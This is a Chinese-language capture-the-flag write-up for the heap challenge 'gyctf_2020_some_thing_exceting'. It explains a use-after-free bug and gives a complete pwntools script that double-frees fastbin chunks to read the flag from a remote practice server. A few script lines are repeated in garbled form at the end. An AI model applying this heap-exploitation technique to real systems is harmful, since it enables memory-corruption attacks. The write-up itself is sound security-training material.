gyctf_2020_some_thing_exceting
惯例我们先checksec一下
除了PIE其他保护全开的64位程序 我们先试运行一下
发现运行不了 进ida64里看发现是需要在根目录上有一个flag文件
添加文件后就可以正常运行了
这里贴一个怎么在根目录下添加文件的指南
sudo nautilus#这条命令由于以管理员的身份打开文件管理器
然后选择filesystem root在其中右键选择打开我们的terminal
然后执行
touch flag
命令即可生成flag文件
看看main函数 是一体非常标准的菜单题
1 添加堆 2编辑堆 3 删除堆 4 打印堆
1 添加堆
2 编辑堆(实际上这是个不可执行的函数)
3 删除堆
存在uaf漏洞
4 打印堆
审题完成开始解题
利用uaf漏洞将fastbin的fd指针篡改为flag-0x10然后在show的时候就可以接收到flag了
此题中我们需要注意的是在最后一次add时na的chunk大小需要我们改成除0x50外的任意大小 因为此时我们实际上已经跳转到了flag上因此无法再次跳转
以及最后打印出的flag不知道为啥被吞掉了一部分 可能是对齐的问题 但问题不大 我们只要手动把开头被吞掉的f字母填上即可
from pwn import *
#io=process('./gyctf_2020_some_thing_exceting')
context.log_level='debug'
io=remote('node4.buuoj.cn',26257)
flag = 0x6020A8-0x10
def add(size1,content1,size2,content2):
io.recvuntil('> Now please tell me what you want to do :')
io.sendline('1')
io.recvuntil('length : ')
io.sendline(str(size1))
io.recvuntil('> ba : ')
io.sendline(content1)
io.recvuntil('length : ')
io.sendline(str(size2))
io.recvuntil('> na : ')
io.sendline(content2)
def show(index):
io.recvuntil('to do :')
io.sendline('4')
io.recvuntil('project ID : ')
io.sendline(str(index))
def free(index):
io.recvuntil('to do :')
io.sendline('3')
io.recvuntil('Banana ID : ')
io.sendline(str(index))
add(0x50,'aaaa',0x50,'bbbb')
add(0x50,'cccc',0x50,'dddd')
add(0x20,'eeee',0x20,'ffff')
free(0)
free(1)
free(0)
add(0x50,p64(flag),0x50,'aaaa')
add(0x50,'aaaa',0x50,'aaaa')
add(0x50,'',0x60,'aaaa')
show(0)
io.interactive()
g),0x50,‘aaaa’)
add(0x50,‘aaaa’,0x50,‘aaaa’)
add(0x50,‘’,0x60,‘aaaa’)
show(0)
io.interactive()